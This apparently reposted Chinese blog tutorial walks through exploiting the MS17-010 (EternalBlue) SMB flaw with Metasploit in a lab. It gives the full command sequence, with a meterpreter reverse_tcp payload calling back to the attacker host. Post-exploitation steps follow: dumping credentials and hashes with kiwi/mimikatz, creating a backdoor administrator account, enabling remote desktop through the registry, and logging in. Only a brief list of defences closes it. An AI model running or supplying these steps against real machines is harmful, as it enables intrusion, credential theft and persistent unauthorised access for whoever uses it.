MS17-010永恒之藍漏洞利用-有解無憂

MS17-010永恒之藍漏洞利用

原理

永恒之藍漏洞是方程式組織在其漏洞利用框架中一個針對SMB服務進行攻擊的漏洞，該漏洞導致攻擊者在目標系統上可以執行任意代碼，SMB服務在Windows與UNIX系列OS之間搭起一座橋梁，讓兩者的資源可互通有無，漏洞原理的深入研究，請參考：(https://blog.csdn.net/luoshenwei3533/article/details/82931999)

實驗前準備

攻擊ip：192.168.200.130
被攻擊ip：192.168.200.101  開啟了445埠（默認是開啟的）,未打漏洞補丁，關閉防火墻
二者能夠相互ping通

步驟

1、啟動MSF

msfconsole

2、ms17_010模塊使用程序

search ms17_010                              查找相應的漏洞模塊
?
use exploit/windows/smb/ms17_010_psexec      加載模塊
?
set RHOSTS 192.168.200.101                   設定攻擊目標
?
check                                        進行檢測，確認是否存在ms17_010漏洞
?
set payload windows/meterpreter/reverse_tcp  加載payload
?
set LHOST 192.168.200.130                    設定本地IP
?
show options                                 查看模塊相關引數
?
run                                          攻擊

（1）查找相應的漏洞模塊

（2）加載模塊并設定目標

我們這里使用第1個，即”exploit/windows/smb/ms17_010_psexec“模塊，并設定RHOSTS為被攻擊IP

使用check命令檢測一下是否存在ms17_010漏洞，檢測時，會自動加載auxiliary/scanner/smb/smb_ms17_010模塊，可以看到，被攻擊目標是存在這個漏洞的，

（3）加載payload

這里使用windows/meterpreter/reverse_tcp作為攻擊payload，

攻擊前，再用show options命令檢查一下設定是否正確，

(4)攻擊

3、漏洞利用

(1) 查看系統資訊 sysinfo

(2) 查看當前用戶的權限 getuid

(3))獲取目標系統權限 shell

(4)獲取目標主機用戶以及密碼，需要使用system權限，如果是在administrator下，直接使用 getsystem 即可

load kiwi  加載kiwi模塊
help kiwi  查看kiwi模塊幫助

creds_all 查看用戶，密碼，密碼對應hash值等

kiwi具體命令

load kiwi
?
creds_all：列舉所有憑據
creds_kerberos：列舉所有kerberos憑據
creds_msv：列舉所有msv憑據
creds_ssp：列舉所有ssp憑據
creds_tspkg：列舉所有tspkg憑據
creds_wdigest：列舉所有wdigest憑據
dcsync：通過DCSync檢索用戶帳戶資訊
dcsync_ntlm：通過DCSync檢索用戶帳戶NTLM散列、SID和RID
golden_ticket_create：創建黃金票據
kerberos_ticket_list：列舉kerberos票據
kerberos_ticket_purge：清除kerberos票據
kerberos_ticket_use：使用kerberos票據
kiwi_cmd：執行mimikatz的命令，后面接mimikatz.exe的命令
lsa_dump_sam：dump出lsa的SAM
lsa_dump_secrets：dump出lsa的密文
password_change：修改密碼
wifi_list：列出當前用戶的wifi組態檔
wifi_list_shared：列出共享wifi組態檔/編碼

(5)開啟目標遠程

開啟目標遠程，并創建一個test帳戶

>>方法一

meterpreter > run post/windows/manage/enable_rdp username="test" password="123456"

驗證

>>方法二

shell　　　　
net user lfn 123456 /add                      創建用戶
net localgroup administrators lfn /add    添加管理員權限

>>ps如果目標機器沒有開啟遠程桌面服務，使用注冊表進行打開

C:\Windows\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

使用剛才創建的用戶和密碼進行遠程，進行遠程控制，

rdesktop 192.168.200.101 -u test -p 123456

防護措施

關閉445等高危埠
配置防火墻，安裝防護軟體
安裝補丁

轉載請註明出處，本文鏈接：https://www.uj5u.com/qita/498730.html

標籤：其他

上一篇：史上最強安全大賽：2022潮汐安全應用開發大賽

下一篇：實操自動生成介面自動化測驗用例